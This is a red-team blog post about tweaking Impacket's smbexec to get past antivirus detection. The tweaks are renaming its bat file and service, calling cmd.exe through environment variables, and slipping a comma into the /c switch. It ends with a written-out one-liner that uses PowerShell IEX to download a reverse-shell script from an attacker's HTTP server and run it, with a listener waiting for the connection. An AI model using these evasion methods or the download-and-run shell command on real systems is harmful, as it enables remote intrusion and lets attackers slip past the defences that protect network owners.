One of the things that makes a good red teamer is to understand our tools. I noticed recently how these tools are being looked at and I demonstrate a little on what we can do about these well known attacks.
We all know the glorious Impacket tools, very well known in the Cybersecurity Community and hackers among us. Today I will take a look at the Impacket tools. I was recently surprised by how these tools get detected and why are they found while Threat Hunting, I also wanted to understand on why it was happening. And while searching I was mind blown, probably old to some people but damn I wanted to write about it.
I will work with SMBEXEC on this talk.
Now let’s check a little the SMBEXEC code. One of the first things that stand out to me is some BAT files and output files that seems to be written onto the target machine when executed.
Let’s run the tool and see what happens out of the box to take a better look at what is going on with this tool.
As expected
But, why?. Let’s take a look at what happened.
Oh, so I’s a command line that is getting detected, it does seem to be strange that an Administrator Account tries to Write a bat file onto the Temp Folder, Execute it and then remove it. Right?.
Now let’s take a look at the part of Impacket that gets detected and find this piece of code. We are well aware that we have a section of the code where it’s creating the execute.bat file
Now I changed the code and found some “synonyms” of each of the words that were hardcoded onto the tool, I had no idea what BTO meant so I chose a more “legitimate” service name.
Now let’s try running the tool again. [Remember we still haven’t changed the command, wanted to test if this was enough to bypass] .
Damn it, no luck at all.
Ok, now let’s dig a little deeper on the command line this time.
Ok, let’s see the self._output section, looks for the local drive C$ (Accessible to Administrator) smbexec will choose this by default if no other is selected, will continue to output the BAT file, execute it and then proceed to delete it. But look here, it seems to be calling cmd.exe using an environment variable for all this to run. Let us take a quick look at our variables for Windows.
Aaaah so there we go, cmd.exe now, in what other ways can we call cmd.exe?, Directly with other variables?. Let’s go down a little further.
Here are some interesting ones, %SystemDrive%, %SystemRoot%, %windir%. Great we have 3 options to have our way and execute cmd.exe, let’s try these for our tool smbexec.
Ok, so I edited it for it to call cmd.exe in a different manner I will use 1 variable and add the other part of the path to reach cmd.exe
Let’s see what happens:
Damn it’s still getting caught, let’s dive a little more, so what other thing can get detected besides our different variables that are used, oh your thinking the same right?. Exactly the parameters, very smart. But which one is it? /Q or /c maybe both???. Let’s not take a risk and do something about that.
Now let’s understand what happens when we use these parameters we want to focus on /Q, /c. So if we check the help menu from CMD
Ok so /C carries out the command by string and then it terminates it [this is important], if we run smbexec with this here is the result on Process Explorer:
But if we run it with /k carries out the command but remains.
We have a process, and its running as SYSTEM, damn. No output of course, we gain a shell but we leave a process behind.
But, what other alternatives do we have??. Change the Environment variable and add a slight tweak to the /c parameter, I don’t know why but this works just by adding a (,). I tried to understand it but it seems way over my knowledge cmd is very amazing so much we do not know.
[After a while I noticed that the parameter /c was the one being flagged]
Now let’s try it.
Ok nice video if I say so, but now I am thinking, wait you have Code Execution why are you doing all this crazy stuff?. Why not just execute a PowerShell Command and call your obfuscated, super hidden payload instead of leaving traces behind. Well of course you can do that as well!!.
We have out AV up and running:
Now let’s move back to our attacking machine and execute our smbexec with our PowerShell command
I setup a listener, my command running smbexec and a python server to call my shell and receive the connection back to my machine.
Listener:
Python Server:
SMBEXEC:
cmd.exe /Q /c powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.20:8000/Connectar-Tcp.ps1');
Shell:
Afterwards:
Breaks SMBEXEC
After this simple demonstration I wanted to show how some changes to our tools functionality can have us again connected to the user’s network. We have plenty of possibilities to achieve our goal. We just have to think a little bit out of the Box
You can take a look that the AV was only flagging the /c parameter and probably anything after that, but once a small difference is added we can see that our code gets executed as there are plenty of methods to achieve this, Hmm maybe replacing it with a LOLBIN???. Who knows but it might be out there.
Keep Learning!!
